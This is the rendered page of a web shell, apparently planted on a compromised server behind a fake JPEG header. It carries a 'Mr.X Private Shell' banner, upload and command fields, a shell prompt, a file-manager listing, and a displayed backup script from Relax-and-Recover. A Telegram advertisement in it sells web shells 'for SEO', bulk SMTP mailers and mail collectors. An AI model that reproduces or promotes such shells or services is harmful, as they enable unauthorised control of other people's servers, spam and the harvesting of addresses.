����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.
#
# 100_get_suffix.sh

# Do we have Borg binary?
has_binary borg
StopIfError "Could not find Borg binary"

# Let's find largest suffix in use, and increment it by 1.
BORGBACKUP_SUFFIX=0

while IFS= read -r suffix_tmp; do
    if [ "$suffix_tmp" -gt "$BORGBACKUP_SUFFIX" ]; then
        BORGBACKUP_SUFFIX=$suffix_tmp
    fi
done < <( grep "^${BORGBACKUP_ARCHIVE_PREFIX}_" "$BORGBACKUP_ARCHIVE_CACHE" \
    | awk '{print $1}' \
    | cut -d "_" -f 2 )

BORGBACKUP_SUFFIX=$(( BORGBACKUP_SUFFIX + 1 ))

Filemanager

Name Type Size Permission Actions
100_get_suffix.sh File 644 B 0644
400_create_include_exclude_files.sh File 6.16 KB 0644
500_make_backup.sh File 4.87 KB 0644
800_prune_old_backups.sh File 2.75 KB 0644
900_umount_usb.sh File 425 B 0644